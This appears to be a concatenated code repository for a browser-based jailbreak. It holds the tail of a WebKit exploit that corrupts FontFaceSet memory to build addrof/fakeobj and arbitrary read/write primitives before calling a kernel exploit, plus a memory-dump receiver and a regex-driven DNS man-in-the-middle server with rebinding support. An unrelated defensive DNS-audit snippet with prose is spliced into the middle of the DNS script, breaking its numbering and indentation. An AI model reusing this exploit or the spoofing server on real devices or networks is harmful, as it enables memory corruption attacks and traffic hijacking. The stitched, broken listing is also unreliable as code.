196 | if (fastmalloc.charCodeAt(i) == 0x42 &&
197 | fastmalloc.charCodeAt(i + 1) == 0x44 &&
198 | fastmalloc.charCodeAt(i + 2) == 0x43 &&
199 | fastmalloc.charCodeAt(i + 3) == 0x41 &&
200 | fastmalloc.charCodeAt(i + 4) == 0 &&
201 | fastmalloc.charCodeAt(i + 5) == 0 &&
202 | fastmalloc.charCodeAt(i + 6) == 254 &&
203 | fastmalloc.charCodeAt(i + 7) == 255 &&
204 | fastmalloc.charCodeAt(i + 24) == 14
205 | ) {
206 | jsvalue_leak = stringToPtr(fastmalloc, i + 32);
207 | break;
208 | }
209 | }
210 | }
211 |
212 | var rd_leak = makeReader(jsvalue_leak, 'ffs4');
213 | var array256 = stringToPtr(rd_leak, 16); //arrays[256]
214 | var ui32a = stringToPtr(rd_leak, 24); //Uint32Array
215 |
216 | var rd_arr = makeReader(array256, 'ffs5');
217 | var butterfly = stringToPtr(rd_arr, 8);
218 |
219 | var rd_ui32 = makeReader(ui32a, 'ffs6');
220 | for (var i = 0; i < 8; i++)
221 | union_b[i] = rd_ui32.charCodeAt(i);
222 |
223 | var structureid_low = union_i[0];
224 | var structureid_high = union_i[1];
225 |
226 | //setup for addrof/fakeobj
227 | //in array[256] butterfly: 0 = &bad_fonts[guessed_font+12] as double
228 | //in array[257] butterfly: 0 = {0x10000, 0x10000} as jsvalue
229 | union_i[0] = 0x10000;
230 | union_i[1] = 0; //account for nan-boxing
231 | arrays[257][1] = {}; //force it to still be jsvalue-array not double-array
232 | arrays[257][0] = union_f[0];
233 | union_i[0] = (guessed_addr + 12 * SIZEOF_CSS_FONT_FACE) | 0;
234 | union_i[1] = (guessed_addr - guessed_addr % 0x100000000) / 0x100000000;
235 | arrays[256][i] = union_f[0];
236 |
237 | //hammer time!
238 |
239 | pp_s = '';
240 | pp_s += ptrToString(56);
241 | for (var i = 0; i < 12; i++)
242 | pp_s += ptrToString(guessed_addr + i * SIZEOF_CSS_FONT_FACE);
243 |
244 | var fake_s = '';
245 | fake_s += '0000'; //padding for 8-byte alignment
246 | fake_s += ptrToString(INVALID_POINTER); //never dereferenced
247 | fake_s += ptrToString(butterfly); //hammer target
248 | fake_s += '\u0000\u0000\u0000\u0000\u0022\u0000\u0000\u0000'; //length=34
249 |
250 | var ffs7_args = [];
251 | for (var i = 0; i < 12; i++)
252 | ffs7_args.push(bad_fonts[guessed_font + i]);
253 | ffs7_args.push(good_font);
254 |
255 | var ffs8_args = [bad_fonts[guessed_font + 12]];
256 | for (var i = 0; i < 5; i++)
257 | ffs8_args.push(new FontFace(HAMMER_FONT_NAME, "url(data:text/html,)", {}));
258 |
259 | for (var i = 0; i < HAMMER_NSTRINGS; i++)
260 | mkString(HASHMAP_BUCKET, pp_s);
261 |
262 | ffses.ffs7 = new FontFaceSet(ffs7_args);
263 | mkString(HASHMAP_BUCKET, pp_s);
264 | ffses.ffs8 = new FontFaceSet(ffs8_args);
265 | var post_ffs = mkString(HASHMAP_BUCKET, fake_s);
266 | needfix.push(post_ffs);
267 |
268 | for (var i = 0; i < 13; i++)
269 | bad_fonts[guessed_font + i].family = "hammer" + i;
270 |
271 | function boot_addrof(obj) {
272 | arrays[257][32] = obj;
273 | union_f[0] = arrays[258][0];
274 | return union_i[1] * 0x100000000 + union_i[0];
275 | }
276 |
277 | function boot_fakeobj(addr) {
278 | union_i[0] = addr;
279 | union_i[1] = (addr - addr % 0x100000000) / 0x100000000;
280 | arrays[258][0] = union_f[0];
281 | return arrays[257][32];
282 | }
283 |
284 | //craft misaligned typedarray
285 |
286 | var arw_master = new Uint32Array(8);
287 | var arw_slave = new Uint8Array(1);
288 | var obj_master = new Uint32Array(8);
289 | var obj_slave = {
290 | obj: null
291 | };
292 |
293 | var addrof_slave = boot_addrof(arw_slave);
294 | var addrof_obj_slave = boot_addrof(obj_slave);
295 | union_i[0] = structureid_low;
296 | union_i[1] = structureid_high;
297 | union_b[6] = 7;
298 | var obj = {
299 | jscell: union_f[0],
300 | butterfly: true,
301 | buffer: arw_master,
302 | size: 0x5678
303 | };
304 |
305 | function i48_put(x, a) {
306 | a[4] = x | 0;
307 | a[5] = (x / 4294967296) | 0;
308 | }
309 |
310 | function i48_get(a) {
311 | return a[4] + a[5] * 4294967296;
312 | }
313 |
314 | window.addrof = function (x) {
315 | obj_slave.obj = x;
316 | return i48_get(obj_master);
317 | }
318 |
319 | window.fakeobj = function (x) {
320 | i48_put(x, obj_master);
321 | return obj_slave.obj;
322 | }
323 |
324 | function read_mem_setup(p, sz) {
325 | i48_put(p, arw_master);
326 | arw_master[6] = sz;
327 | }
328 |
329 | window.read_mem = function (p, sz) {
330 | read_mem_setup(p, sz);
331 | var arr = [];
332 | for (var i = 0; i < sz; i++)
333 | arr.push(arw_slave[i]);
334 | return arr;
335 | };
336 |
337 | window.write_mem = function (p, data) {
338 | read_mem_setup(p, data.length);
339 | for (var i = 0; i < data.length; i++)
340 | arw_slave[i] = data[i];
341 | };
342 |
343 | window.read_ptr_at = function (p) {
344 | var ans = 0;
345 | var d = read_mem(p, 8);
346 | for (var i = 7; i >= 0; i--)
347 | ans = 256 * ans + d[i];
348 | return ans;
349 | };
350 |
351 | window.write_ptr_at = function (p, d) {
352 | var arr = [];
353 | for (var i = 0; i < 8; i++) {
354 | arr.push(d & 0xff);
355 | d /= 256;
356 | }
357 | write_mem(p, arr);
358 | };
359 |
360 | (function () {
361 | var magic = boot_fakeobj(boot_addrof(obj) + 16);
362 | magic[4] = addrof_slave;
363 | magic[5] = (addrof_slave - addrof_slave % 0x100000000) / 0x100000000;
364 | obj.buffer = obj_master;
365 | magic[4] = addrof_obj_slave;
366 | magic[5] = (addrof_obj_slave - addrof_obj_slave % 0x100000000) / 0x100000000;
367 | magic = null;
368 | })();
369 |
370 | //fix fucked objects to stabilize webkit
371 |
372 | (function () {
373 | //fix fontfaceset (memmoved 96 bytes to low, move back)
374 | var ffs_addr = read_ptr_at(addrof(post_ffs) + 8) - 208;
375 | write_mem(ffs_addr, read_mem(ffs_addr - 96, 208));
376 | //fix strings (restore "valid") header
377 | for (var i = 0; i < needfix.length; i++) {
378 | var addr = read_ptr_at(addrof(needfix[i]) + 8);
379 | write_ptr_at(addr, (HASHMAP_BUCKET - 20) * 0x100000000 + 1);
380 | write_ptr_at(addr + 8, addr + 20);
381 | write_ptr_at(addr + 16, 0x80000014);
382 | }
383 | //fix array butterfly
384 | write_ptr_at(butterfly + 248, 0x1f0000001f);
385 | })();
386 |
387 | //^ @sleirs' stuff. anything pre arb rw is magic, I'm happy I don't have to deal with that.
388 |
389 | //create compat stuff for kexploit.js
390 | let expl_master = new Uint32Array(8);
391 | let expl_slave = new Uint32Array(2);
392 | let addrof_expl_slave = addrof(expl_slave);
393 | let m = fakeobj(addrof(obj) + 16);
394 | obj.buffer = expl_slave;
395 | m[7] = 1;
396 | obj.buffer = expl_master;
397 | m[4] = addrof_expl_slave;
398 | m[5] = (addrof_expl_slave - addrof_expl_slave % 0x100000000) / 0x100000000;
399 | m[7] = 1;
400 |
401 | let prim = {
402 | write8: function (addr, value) {
403 | expl_master[4] = addr.low;
404 | expl_master[5] = addr.hi;
405 | if (value instanceof int64) {
406 | expl_slave[0] = value.low;
407 | expl_slave[1] = value.hi;
408 | } else {
409 | expl_slave[0] = value;
410 | expl_slave[1] = 0;
411 | }
412 | },
413 | write4: function (addr, value) {
414 | expl_master[4] = addr.low;
415 | expl_master[5] = addr.hi;
416 | if (value instanceof int64) {
417 | expl_slave[0] = value.low;
418 | } else {
419 | expl_slave[0] = value;
420 | }
421 | },
422 | write2: function (addr, value) {
423 | expl_master[4] = addr.low;
424 | expl_master[5] = addr.hi;
425 | let tmp = expl_slave[0] & 0xFFFF0000;
426 | if (value instanceof int64) {
427 | expl_slave[0] = ((value.low & 0xFFFF) | tmp);
428 | } else {
429 | expl_slave[0] = ((value & 0xFFFF) | tmp);
430 | }
431 | },
432 | write1: function (addr, value) {
433 | expl_master[4] = addr.low;
434 | expl_master[5] = addr.hi;
435 | let tmp = expl_slave[0] & 0xFFFFFF00;
436 | if (value instanceof int64) {
437 | expl_slave[0] = ((value.low & 0xFF) | tmp);
438 | } else {
439 | expl_slave[0] = ((value & 0xFF) | tmp);
440 | }
441 | },
442 | read8: function (addr) {
443 | expl_master[4] = addr.low;
444 | expl_master[5] = addr.hi;
445 | return new int64(expl_slave[0], expl_slave[1]);
446 | },
447 | read4: function (addr) {
448 | expl_master[4] = addr.low;
449 | expl_master[5] = addr.hi;
450 | return expl_slave[0];
451 | },
452 | read2: function (addr) {
453 | expl_master[4] = addr.low;
454 | expl_master[5] = addr.hi;
455 | return expl_slave[0] & 0xFFFF;
456 | },
457 | read1: function (addr) {
458 | expl_master[4] = addr.low;
459 | expl_master[5] = addr.hi;
460 | return expl_slave[0] & 0xFF;
461 | },
462 | leakval: function (obj) {
463 | obj_slave.obj = obj;
464 | return new int64(obj_master[4], obj_master[5]);
465 | }
466 | };
467 | window.p = prim;
468 | run_hax();
469 | }
--------------------------------------------------------------------------------
/dumpserver.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import time
3 | import struct
4 | import locale
5 | 
6 | def server_program():
7 |     host = '0.0.0.0'
8 |     port = 5656
9 | 
10 |     server_socket = socket.socket()
11 |     server_socket.bind((host, port))
12 | 
13 |     server_socket.listen(1)
14 |     conn, address = server_socket.accept()  # accept new connection
15 |     conn.settimeout(60)  # 60 second timeout
16 |     print("Connection from: " + str(address))
17 | 
18 | 
19 |     timestr = time.strftime("%Y%m%d-%H%M%S")
20 |     print("[+] Writing dump to dump-" + timestr + ".bin...")
21 | 
22 |     total_received = 0
23 |     with open("dump-" + timestr + ".bin", "wb") as f:
24 |         while True:
25 |             try:
26 |                 data = conn.recv(0x10000)
27 |                 total_received += len(data)
28 |                 print("Received " + str(total_received) + " bytes...")
29 |                 if not data:  # empty read: peer closed the connection
30 |                     break
31 |                 f.write(data)
32 |             except OSError:  # socket.timeout or a reset; a bare except would also swallow Ctrl-C
33 |                 break
34 |     # the with-block already closed f
35 |     conn.close()
36 |     server_socket.close()
37 | 
38 | if __name__ == '__main__':
39 |     server_program()
--------------------------------------------------------------------------------
/fakedns.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | """Fakedns.py: A regular-expression based DNS MITM Server by Crypt0s."""
3 | 
4 | # This isn't the most elegant way - i could possibly support both versions of python,
5 | # but people should really not use Python 2 anymore.
6 | import sys
7 | vnum = sys.version.split()[0]
8 | if int(vnum[0]) < 3:
9 |     print("Python 2 support has been deprecated. Please run FakeDNS using Python3!")
10 |     sys.exit(1)
11 | 
12 | import binascii
13 | import socket
14 | import re
15 | import sys
16 | import os
17 | import socketserver as SocketServer
18 | import signal
19 | import argparse
20 | import struct
21 | import random
22 | import configparser as ConfigParser
23 | 
24 | # inspired from DNSChef
25 | class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
26 |     def __init__(self, server_address, request_handler):
27 |         self.address_family = socket.AF_INET
28 |         SocketServer.UDPServer.__init__(
29 |             self, server_address, request_handler)
30 | 
31 | 
32 | class UDPHandler(SocketServer.BaseRequestHandler):
33 |     def handle(self):
34 |         (data, s) = self.request
35 |         respond(data, self.client_address, s)
36 | 
37 | 
38 | class DNSQuery:
39 |     def __init__(self, data):
40 |         self.data = data
41 |         self.domain = b''
42 |         tipo = (data[2] >> 3) & 15  # Opcode bits
43 |         if tipo == 0:  # Standard query
44 |             ini = 12
45 |             lon = data[ini]
46 |             while lon != 0:
47 |                 self.domain += data[ini + 1:ini + lon + 1] + b'.'
48 |                 ini += lon + 1  # you can implement CNAME and PTR
49 |                 lon = data[ini]
50 |             self.type = data[ini:][1:3]
51 |         else:
52 |             self.type = data[-4:-2]
53 | 
54 | # Because python doesn't have native ENUM in 2.7:
55 | # https://en.wikipedia.org/wiki/List_of_DNS_record_types
56 | TYPE = {
57 |     b"\x00\x01": "A",
58 |     b"\x00\x1c": "AAAA",
59 |     b"\x00\x05": "CNAME",
60 |     b"\x00\x0c": "PTR",
61 |     b"\x00\x10": "TXT",
62 |     b"\x00\x0f": "MX",
63 |     b"\x00\x06": "SOA"
64 | }
65 | 
66 | # Stolen:
67 | # https://github.com/learningequality/ka-lite/blob/master/python-packages/django/utils/ipv6.py#L209
68 | def _is_shorthand_ip(ip_str):
69 |     """Determine if the address is shortened.
70 |     Args:
71 |         ip_str: A string, the IPv6 address.
72 |     Returns:
73 |         A boolean, True if the address is shortened.
74 |     """
75 |     if ip_str.count('::') == 1:
76 |         return True
77 |     if any(len(x) < 4 for x in ip_str.split(':')):
78 |         return True
79 |     return False
80 | 
81 | # Stolen:
82 | # https://github.com/learningequality/ka-lite/blob/master/python-packages/django/utils/ipv6.py#L209
83 | def _explode_shorthand_ip_string(ip_str):
84 |     """
85 |     Expand a shortened IPv6 address.
86 |     Args:
87 |         ip_str: A string, the IPv6 address.
88 |     Returns:
89 |         A string, the expanded IPv6 address.
90 |     """
91 |     if not _is_shorthand_ip(ip_str):
92 |         # We've already got a longhand ip_str.
93 |         return ip_str
94 | 
95 |     hextet = ip_str.split('::')
96 | 
97 |     # If there is a ::, we need to expand it with zeroes
98 |     # to get to 8 hextets - unless there is a dot in the last hextet,
99 |     # meaning we're doing v4-mapping
100 |     if '.' in ip_str.split(':')[-1]:
101 |         fill_to = 7
102 |     else:
103 |         fill_to = 8
104 | 
105 |     if len(hextet) > 1:
106 |         sep = len(hextet[0].split(':')) + len(hextet[1].split(':'))
107 |         new_ip = hextet[0].split(':')
108 | 
109 |         for _ in range(fill_to - sep):
110 |             new_ip.append('0000')
111 |         new_ip += hextet[1].split(':')
112 | 
113 |     else:
114 |         new_ip = ip_str.split(':')
115 | 
116 |     # Now need to make sure every hextet is 4 lower case characters.
117 |     # If a hextet is < 4 characters, we've got missing leading 0's.
118 |     ret_ip = []
119 |     for hextet in new_ip:
120 |         ret_ip.append(('0' * (4 - len(hextet)) + hextet).lower())
121 |     return ':'.join(ret_ip)
122 | 
123 | 
124 | def _get_question_section(query):
125 |     # Query format is as follows: 12 byte header, question section (comprised
126 |     # of arbitrary-length name, 2 byte type, 2 byte class), followed by an
127 |     # additional section sometimes. (e.g. OPT record for DNSSEC)
128 |     start_idx = 12
129 |     end_idx = start_idx
130 | 
131 |     num_questions = (query.data[4] << 8) | query.data[5]
132 | 
133 |     while num_questions > 0:
134 |         while query.data[end_idx] != 0:
135 |             end_idx += query.data[end_idx] + 1
136 |         # Include the null byte, type, and class
137 |         end_idx += 5
138 |         num_questions -= 1
139 | 
140 |     return query.data[start_idx:end_idx]
141 | 
142 | 
143 | class DNSFlag:
144 |     # qr opcode aa tc rd ra z   rcode
145 |     # 1  0000   0  0  1  1  000 0000
146 |     # accept a series of kwargs to build a proper flags segment.
147 |     def __init__(self,
148 |                  qr=0b1,  # query record, 1 if response
149 |                  opcode=0b0000,  # 0 = query, 1 = inverse query, 2 = status request 3-15 unused
150 |                  aa=0b0,  # authoritative answer = 1
151 |                  tc=0b0,  # truncation - 1 if truncated
152 |                  rd=0b1,  # recursion desired?
153 |                  ra=0b1,  # recursion available
154 |                  z=0b000,  # Reserved, must be zero in queries and responses
155 |                  rcode=0b0000  # errcode, 0 none, 1 format, 2 server, 3 name, 4 not impl, 5 refused, 6-15 unused
156 |                  ):
157 | 
158 |         # pack the elements into an integer
159 |         flag_field = qr
160 |         flag_field = flag_field << 4
161 |         flag_field ^= opcode
162 |         flag_field = flag_field << 1
163 |         flag_field ^= aa
164 |         flag_field = flag_field << 1
165 |         flag_field ^= tc
166 |         flag_field = flag_field << 1
167 |         flag_field ^= rd
168 |         flag_field = flag_field << 1
169 |         flag_field ^= ra
170 |         flag_field = flag_field << 3
171 |         flag_field ^= z
172 |         flag_field = flag_field << 4
173 |         flag_field ^= rcode
174 | 
175 |         self.flag_field = flag_field
176 | 
177 |     # return char rep.
178 |     def pack(self):
179 |         return struct.pack(">H", self.flag_field)
180 | 
181 |
182 | class DNSResponse(object):
183 |     def __init__(self, query):
184 |         self.id = query.data[:2]  # Use the ID from the request.
185 |         self.flags = DNSFlag(aa=args.authoritative).pack()
186 |         self.questions = query.data[4:6]  # Number of questions asked...
187 |         # Answer RRs (Answer resource records contained in response) 1 for now.
188 |         self.rranswers = b"\x00\x01"
189 |         self.rrauthority = b"\x00\x00"  # Same but for authority
190 |         self.rradditional = b"\x00\x00"  # Same but for additionals.
191 |         # Include the question section
192 |         self.query = _get_question_section(query)
193 |         # Name of the resource record: a compression pointer to offset 12, i.e. the name in the question section.
194 |         self.pointer = b"\xc0\x0c"
195 |         # This value is set by the subclass and is defined in TYPE dict.
196 |         self.type = None
197 |         self.dnsclass = b"\x00\x01"  # "IN" class.
198 |         # TODO: Make this adjustable - 1 is good for noobs/testers
199 |         self.ttl = b"\x00\x00\x00\x01"
200 |         # Set by subclass because is variable except in A/AAAA records.
201 |         self.length = None
202 |         self.data = None  # Same as above.
203 | 
204 |     def make_packet(self):
205 |         try:
206 |             return self.id + self.flags + self.questions + self.rranswers + \
207 |                 self.rrauthority + self.rradditional + self.query + \
208 |                 self.pointer + self.type + self.dnsclass + self.ttl + \
209 |                 self.length + self.data
210 |         except Exception as e:  # (TypeError, ValueError):
211 |             print("[!] - %s" % str(e))
212 | 
213 | # All classes need to set type, length, and data fields of the DNS Response
214 | # Finished
215 | class A(DNSResponse):
216 |     def __init__(self, query, record):
217 |         super(A, self).__init__(query)
218 |         self.type = b"\x00\x01"
219 |         self.length = b"\x00\x04"
220 |         self.data = self.get_ip(record)
221 | 
222 |     @staticmethod
223 |     def get_ip(dns_record):
224 |         ip = dns_record
225 |         # Convert each dotted-quad octet to one byte
226 |         return b''.join(int(x).to_bytes(1, 'little') for x in ip.split('.'))
227 | 
228 | # Implemented
229 | class AAAA(DNSResponse):
230 |     def __init__(self, query, address):
231 |         super(AAAA, self).__init__(query)
232 |         self.type = b"\x00\x1c"
233 |         self.length = b"\x00\x10"
234 |         # Address is already encoded properly for the response at rule-builder
235 |         self.data = address
236 | 
237 | # Thanks, stackexchange!
238 | # http://stackoverflow.com/questions/16276913/reliably-get-ipv6-address-in-python
239 | def get_ip_6(host, port=0):
240 |     # search only for the wanted v6 addresses
241 |     result = socket.getaddrinfo(host, port, socket.AF_INET6)
242 |     # just returns the first answer and only the address
243 |     ip = result[0][4][0]
244 |     return ip  # the original dropped the return and always yielded None
245 | 
246 | # Implemented
247 | class CNAME(DNSResponse):
248 |     def __init__(self, query, domain):
249 |         super(CNAME, self).__init__(query)
250 |         self.type = b"\x00\x05"
251 | 
252 |         self.data = b""
253 |         for label in domain.split('.'):
254 |             self.data += bytes([len(label)]) + label.encode()
255 |         self.data += b"\x00"
256 | 
257 |         # RDLENGTH is a 16-bit big-endian value; chr(n).encode() would emit
258 |         # two UTF-8 bytes for n > 127 and corrupt the record.
259 |         self.length = struct.pack(">H", len(self.data))
260 | 
261 | 
262 | # Implemented
263 | class PTR(DNSResponse):
264 |     def __init__(self, query, ptr_entry):
265 |         super(PTR, self).__init__(query)
266 |         if type(ptr_entry) != bytes:
267 |             ptr_entry = ptr_entry.encode()
268 | 
269 |         self.type = b"\x00\x0c"
270 |         self.ttl = b"\x00\x00\x00\x00"
271 |         # Encode the target as length-prefixed labels; the fixed 0x09/0x07
272 |         # label lengths of the original only fit one specific name.
273 |         self.data = b""
274 |         for label in ptr_entry.split(b'.'):
275 |             self.data += bytes([len(label)]) + label
276 |         self.data += b"\x00"
277 |         # RDLENGTH must be a 2-byte big-endian value (the str comparison against "0xff" left a str behind).
278 |         self.length = struct.pack(">H", len(self.data))
279 |
280 | # Finished
281 | class TXT(DNSResponse):
282 |     def __init__(self, query, txt_record):
283 |         super(TXT, self).__init__(query)
284 |         self.type = b"\x00\x10"
285 |         self.data = txt_record.encode()
286 |         # TXT RDATA is one length-prefixed character-string, so RDLENGTH is
287 |         # the text length plus one for that prefix byte (2-byte big-endian).
288 |         self.length = struct.pack(">H", len(self.data) + 1)
289 |         # Then, we have to add the TXT record length field! We utilize the
290 |         # length field for this since it is already in the right spot
291 |         # (make_packet emits length immediately before data).
292 |         self.length += bytes([len(self.data)])
293 | 
294 | 
295 | class MX(DNSResponse):
296 |     def __init__(self, query, txt_record):
297 |         super(MX, self).__init__(query)
298 |         self.type = b"\x00\x0f"
299 |         self.data = b"\x00\x01" + self.get_domain(txt_record) + b"\x00"
300 |         # RDLENGTH covers the 2-byte preference, the labels and the terminator.
301 |         self.length = struct.pack(">H", len(self.data))
302 | 
303 | 
304 |     @staticmethod
305 |     def get_domain(dns_record):
306 |         domain = dns_record
307 |         ret_domain = []
308 |         for x in domain.split('.'):
309 |             # length-prefixed label; str.decode("hex") only existed in Python 2
310 |             ret_domain.append(bytes([len(x)]))
311 |             ret_domain.append(x.encode())
312 |         return b"".join(ret_domain)
313 | 
314 | class SOA(DNSResponse):
315 |     def __init__(self, query, config_location):
316 |         super(SOA, self).__init__(query)
317 | 
318 |         # TODO: pre-read and cache all the config files for the rules for speed.
319 |         config = ConfigParser.ConfigParser(inline_comment_prefixes=";")
320 |         config.read(config_location)
321 | 
322 |         # handle cases where we want the serial to be random
323 |         serial = config.get(query.domain.decode(), "serial")
324 |         if serial.lower() == "random":
325 |             serial = int(random.getrandbits(32))
326 |         else:
327 |             # serial is still a str, cast to int.
328 |             serial = int(serial)
329 | 
330 |         self.type = b"\x00\x06"
331 |         self.mname = config.get(query.domain.decode(), "mname")  # name server that was original or primary source for this zone
332 |         self.rname = config.get(query.domain.decode(), "rname")  # domain name which specified mailbox of person responsible for zone
333 |         self.serial = serial  # 32-bit long version number of the zone copy
334 |         self.refresh = config.getint(query.domain.decode(), "refresh")  # 32-bit time interval before zone refresh
335 |         self.retry = config.getint(query.domain.decode(), "retry")  # 32-bit time interval before retrying failed refresh
336 |         self.expire = config.getint(query.domain.decode(), "expire")  # 32-bit time interval after which the zone is not authoritative
337 |         self.minimum = config.getint(query.domain.decode(), "minimum")  # The unsigned 32 bit minimum TTL for any RR from this zone.
338 | 
339 |         # convert the config entries into DNS format. Convenient conversion function will be moved up to module later.
340 |         def convert(fqdn):
341 |             tmp = b""
342 |             for domain in fqdn.split('.'):
343 |                 tmp += bytes([len(domain)]) + domain.encode()
344 |             tmp += b"\xc0\x0c"
345 |             return tmp
346 | 
347 |         self.data = b""
348 | 
349 |         self.mname = convert(self.mname)
350 |         self.data += self.mname
351 | 
352 |         self.rname = convert(self.rname)
353 |         self.data += self.rname  # already is a bytes object.
354 | 
355 |         # pack the rest of the structure
356 |         self.data += struct.pack('>I', self.serial)
357 |         self.data += struct.pack('>I', self.refresh)
358 |         self.data += struct.pack('>I', self.retry)
359 |         self.data += struct.pack('>I', self.expire)  # the original packed refresh a second time here
360 |         self.data += struct.pack('>I', self.minimum)
361 | 
362 |         # get length of the answers area
363 |         # RDLENGTH is a 2-byte big-endian value; the original chr()/"0xff"
364 |         # comparison left a str that make_packet could not concatenate.
365 |         self.length = struct.pack(">H", len(self.data))
366 | 
367 | 
368 | 
369 |
370 |
371 | # And this one is because Python doesn't have Case/Switch
372 | CASE = {
373 |     b"\x00\x01": A,
374 |     b"\x00\x1c": AAAA,
375 |     b"\x00\x05": CNAME,
376 |     b"\x00\x0c": PTR,
377 |     b"\x00\x10": TXT,
378 |     b"\x00\x0f": MX,
379 |     b"\x00\x06": SOA,
380 | }
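The response classes above assemble answers by hand: DNSFlag packs the 16-bit flag word, and DNSResponse.make_packet emits header, the copied question section, a 0xC00C compression pointer back to the question name, then type, class, TTL, RDLENGTH and RDATA. The following is an added example, not code from fakedns.py or this repository, showing the same layout from the resolver or monitoring side: a parser for that wire format (including the compression pointer) and an audit that flags the properties a fakedns-style answer exhibits, namely a TTL of 1 and an A record pointing into private address space, plus the basic ID/QR/RCODE/question checks a client should make before trusting any answer. The function names (parse_dns_response, audit_response, build_question, build_fakedns_style_answer) and the sample packets are assumptions constructed for this example.

```python
import ipaddress
import struct


def _read_name(msg, off, max_jumps=8):
    """Decode a DNS name at offset `off`, following 0xC0xx compression
    pointers (fakedns emits 0xC00C: offset 12, the question name).
    Returns (dotted name, offset just past the name at its original position).
    The jump budget stops pointer loops in malformed messages."""
    labels, jumped, end, jumps = [], False, None, 0
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                      # compression pointer
            jumps += 1
            if jumps > max_jumps:
                raise ValueError("compression pointer loop")
            if not jumped:
                end = off + 2                      # resume after the 2-byte pointer
            jumped = True
            off = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            continue
        if ln == 0:                                # root label terminates the name
            off += 1
            break
        labels.append(msg[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln
    return ".".join(labels), end if end is not None else off


def parse_dns_response(msg):
    """Parse header, question and answer sections; also works on queries."""
    if len(msg) < 12:
        raise ValueError("short header")
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    header = {"id": txid, "qr": (flags >> 15) & 1, "opcode": (flags >> 11) & 0xF,
              "aa": (flags >> 10) & 1, "tc": (flags >> 9) & 1,
              "rd": (flags >> 8) & 1, "ra": (flags >> 7) & 1, "rcode": flags & 0xF}
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = _read_name(msg, off)
        qtype, qclass = struct.unpack(">HH", msg[off:off + 4])
        off += 4
        questions.append({"name": name, "type": qtype, "class": qclass})
    for _ in range(an):
        name, off = _read_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        if len(rdata) != rdlen:
            raise ValueError("truncated RDATA")
        off += rdlen
        rec = {"name": name, "type": rtype, "class": rclass, "ttl": ttl, "rdata": rdata}
        if rtype == 1 and rdlen == 4:              # A
            rec["address"] = str(ipaddress.IPv4Address(rdata))
        elif rtype == 28 and rdlen == 16:          # AAAA
            rec["address"] = str(ipaddress.IPv6Address(rdata))
        answers.append(rec)
    return {"header": header, "questions": questions, "answers": answers}


def audit_response(query, response, min_ttl=30):
    """Findings a resolver-side monitor would raise for `response` to `query`."""
    q, r = parse_dns_response(query), parse_dns_response(response)
    findings = []
    if q["header"]["id"] != r["header"]["id"]:
        findings.append("transaction id mismatch")
    if r["header"]["qr"] != 1:
        findings.append("QR bit not set on response")
    if r["header"]["rcode"] != 0:
        findings.append("rcode %d" % r["header"]["rcode"])
    if q["questions"] != r["questions"]:
        findings.append("question section altered")
    for a in r["answers"]:
        if a["ttl"] < min_ttl:                     # fakedns answers carry TTL 1
            findings.append("ttl %d below %d for %s" % (a["ttl"], min_ttl, a["name"]))
        if "address" in a and ipaddress.ip_address(a["address"]).is_private:
            findings.append("private address %s for %s" % (a["address"], a["name"]))
    return findings


def build_question(txid, name, qtype=1):
    """Constructed sample query: header with RD set, one question, no answers."""
    labels = b"".join(bytes([len(l)]) + l.encode() for l in name.split("."))
    return (struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
            + labels + b"\x00" + struct.pack(">HH", qtype, 1))


def build_fakedns_style_answer(query, ip, ttl=1):
    """Constructed sample response in the layout DNSResponse.make_packet emits:
    same ID, flags 0x8180, the original question, then the 0xC00C pointer,
    type A, class IN, TTL, RDLENGTH and the packed address."""
    txid = struct.unpack(">H", query[:2])[0]
    rdata = ipaddress.IPv4Address(ip).packed
    return (struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0) + query[12:]
            + b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, len(rdata)) + rdata)


# constructed sample traffic: a query for example.test and a fakedns-style answer
SAMPLE_QUERY = build_question(0x1337, "example.test")
SAMPLE_RESPONSE = build_fakedns_style_answer(SAMPLE_QUERY, "192.168.1.20", ttl=1)
```

Run `audit_response(SAMPLE_QUERY, SAMPLE_RESPONSE)` to see the two findings the sample trips (TTL below threshold, private address); the same answer with a public address and a normal TTL audits clean, which is why the ID and question checks alone are not enough to notice a spoofing resolver on the local network.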
381 |
382 | # Technically this is a subclass of A
383 | class NONEFOUND(DNSResponse):
384 | def __init__(self, query):
385 | super(NONEFOUND, self).__init__(query)
386 | self.type = query.type
387 | self.flags = b"\x81\x83"
388 | self.rranswers = b"\x00\x00"
389 | self.length = b"\x00\x00"
390 | self.data = b"\x00"
391 | print(">> Built NONEFOUND response")
392 |
393 |
394 | class Rule (object):
395 | def __init__(self, rule_type, domain, ips, rebinds, threshold):
396 | self.type = rule_type
397 | self.domain = domain
398 | self.ips = ips
399 | self.rebinds = rebinds
400 | self.rebind_threshold = threshold
401 |
402 | # we need an additional object to track the rebind rules
403 | if self.rebinds is not None:
404 | self.match_history = {}
405 | self.rebinds = self._round_robin(rebinds)
406 | self.ips = self._round_robin(ips)
407 |
408 | def _round_robin(self, ip_list):
409 | """
410 | Creates a generator over a list modulo list length to equally move between all elements in the list each request
411 | Since we have rules broken out into objects now, we can have this without much overhead.
412 | """
413 | # check to make sure we don't try to modulo by zero
414 | # if we would, just add the same element to the list again.
415 | if len(ip_list) == 1:
416 | ip_list.append(ip_list[0])
417 |
418 | # should be fine to continue now.
419 | index = 0
420 | while True: # never stop iterating - it's OK since we don't always run
421 | yield ip_list[index]
422 | index += 1
423 | index = index % len(ip_list)
424 |
425 | def match(self, req_type, domain, addr):
426 | # assert that the query type and domain match
427 | try:
428 | req_type = TYPE[req_type]
429 | except KeyError:
430 | return None
431 |
432 | # plain comparisons rather than assert: assert statements are stripped under python -O
433 | if self.type != req_type:
434 |     return None
435 |
436 | if not self.domain.match(domain.decode()):
437 |     return None
441 |
442 | # Check to see if we have a rebind rule and if we do, return that addr first
443 | if self.rebinds:
444 | if self.match_history.get(addr) is not None:
445 |
446 | # passed the threshold - start doing a rebind
